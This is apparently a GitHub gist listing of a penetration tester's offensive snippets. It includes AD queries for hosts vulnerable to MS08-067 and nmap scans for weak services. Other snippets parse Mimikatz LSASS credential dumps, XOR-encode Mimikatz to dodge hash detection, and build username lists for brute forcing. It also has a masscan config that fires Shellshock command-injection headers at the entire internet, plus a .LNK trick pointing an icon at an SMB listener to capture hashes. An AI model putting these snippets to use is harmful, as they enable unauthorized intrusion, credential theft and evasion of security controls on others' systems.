Matt Kelly breakersall
breakersall
/ Find MS08_067 via ADSI and PoshSec-Mod
Last active
August 29, 2015 14:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Uses carlos' https://github.com/darkoperator | |
| $hosts = Get-AuditDSComputerAccount -DomainController <IP> -Credential (Get-Credential) | |
| $hosts | Where-Object {(($_.OperatingSystem -match "XP" -and $_.ServicePack -eq "Service Pack 1") -or ($_.OperatingSystem -match "XP" -and $_.ServicePack -eq "Service Pack 2") -or ($_.OperatingSystem -match "XP" -and $_.ServicePack -eq "")) -or ($_.OperatingSystem -match "2000") -or (($_.OperatingSystem -match "2003" -and $_.ServicePack -eq "") -or ($_.OperatingSystem -match "2003" -and $_.ServicePack -eq "Service Pack 1"))} |
breakersall
/ Find some easy wins nmap
Last active
August 29, 2015 14:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Find tomcat/jboss,ms-sql - Uses carlos' https://github.com/darkoperator | |
| nmap -Pn -p 1433,80,8080,8008,8000,8443,443,8000-8010 -sV -Pn -T4 --min-hostgroup 256 --min-parallelism 32 --script=http-title,ms-sql-empty-password -iL <subnetst2scan> -oX easy-wins.xml | |
| $nmaphosts = Import-NmapXML -NmapXML easy-wins.xml -InfoType Hosts | |
| $nmaphosts | Where-Object {$_.Ports.Service.Product -match "tomcat"} | select-object Ipv4Address | Out-File Tomcat-Hosts.txt | |
| $nmaphosts | Where-Object {$_.Ports.Service.Product -match "jboss"} | select-object Ipv4Address | Out-File Jboss-Hosts.txt | |
| $nmaphosts | Where-Object {$_.Ports.Service.Product -match "Mbedthis"} | Select-Object IPv4Address | Out-File iDRAC-Hosts.txt | |
| $nmaphosts | Where-Object {$_.Ports.Service.Product -match "ms-sql-server"} | select-object Ipv4Address | Out-File MS-SQL-Hosts.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From: http://blog.compower.org/2013/08/05/recover-the-non-plain-password-from-your-unattend-xml/ | |
| $pass = "string" | |
| PS> [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($pass)) |
breakersall
/ gist:9f5250f76295626d6e12
Last active
August 29, 2015 14:06
ShellShock Anti-Shock - masscan
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #InfoSec good dead fairy | |
| #Original from shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html) | |
| target = 0.0.0.0/0 | |
| port = 80 | |
| banners = true | |
| http-user-agent = InfosecFairy | |
| http-header = Cookie:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y | |
| http-header = Host:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y | |
| http-header = Referer:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y |
breakersall
/ gist:f966fc4e25ba9b231c30
Last active
August 29, 2015 14:06
Parse facebook namelist into usable lists for username bruteforcing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #First.Last | |
| $Unamestream = new-object System.IO.StreamWriter("names.txt") | |
| $FNames = Get-Content fname_10.txt | |
| $LNames = Get-Content lname_10.txt | |
| foreach ($FName in $FNames) | |
| { | |
| foreach ($LName in $LNames) | |
| { | |
| $Name = "$FName" + "." + "$LName" | |
| $Unamestream.WriteLine($Name) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Number of minutes to go | |
| [int]$MinutesToCheck = 10080 | |
| function Find-4648Logons | |
| { | |
| <# | |
| .SYNOPSIS | |
| Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the | |
| the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful | |
| for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action. | |
| Function: Find-4648Logons |
breakersall
/ gist:f620b2580e9bfd0af277
Created
April 21, 2015 14:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function ParseMimiLsass | |
| { | |
| $UnameRegex = '^*[Username]{8}' | |
| $DomainRegex = '^*[Domain]{6}' | |
| $PassRegex = '^*[Password]{8}[ ][:]' | |
| $Domains = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-64.txt -Pattern $DomainRegex | Select-Object Line | |
| $Usernames = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-64.txt -Pattern $UnameRegex | Select-Object Line | |
| $Passwords = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-64.txt -Pattern $PassRegex | Select-Object Line | |
| $Domains32 = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-32.txt -Pattern $DomainRegex | Select-Object Line | |
| $Usernames32 = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-32.txt -Pattern $UnameRegex | Select-Object Line |
breakersall
/ gist:c32ff9b2b0fb9fc26c1a
Last active
December 17, 2015 21:10
Example of xor'ing Mimikatz to avoid hash based detection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #######EncodeExample | |
| $inputMim = "C:\Tools\Mimikatz.txt" | |
| $OutMimEnc = "C:\Tools\EncMimikatz.txt" | |
| $bytes = [System.IO.File]::ReadAllBytes("$inputMim") | |
| $key = 137 | |
| for($i=0; $i -lt $bytes.count ; $i++) | |
| { | |
| $bytes[$i] = $bytes[$i] -bxor $key | |
| } | |
| [System.IO.File]::WriteAllBytes("$OutMimEnc", $bytes) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub zxzcvzxcvzxvxzcv() | |
| ' | |
| myAppleScript = "do shell script ""/usr/bin/python -c 'import webbrowser; webbrowser.open_new(\""http://google.com\"")' """ | |
| MacScript (myAppleScript) | |
| ' | |
| | |
| End Sub |
breakersall
/ .LNK PowerShell Post Exploitation
Created
September 29, 2016 23:22
Create .LNK UNC path via PS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $LinkedEXE = "$env:SystemRoot\System32\notepad.exe" | |
| $LNKSaveFile = "pathtosavelnk" | |
| $WScriptShell = New-Object -ComObject Wscript.Shell | |
| $Shortcut = $WScriptShell.CreateShortcut($LNKSaveFile) | |
| $Shortcut.TargetPath = $LinkedEXE | |
| $Shortcut.IconLocation = "\\IPOFSMBLISTENER\images\images.ico" | |
| $Shortcut.save() | |
OlderNewer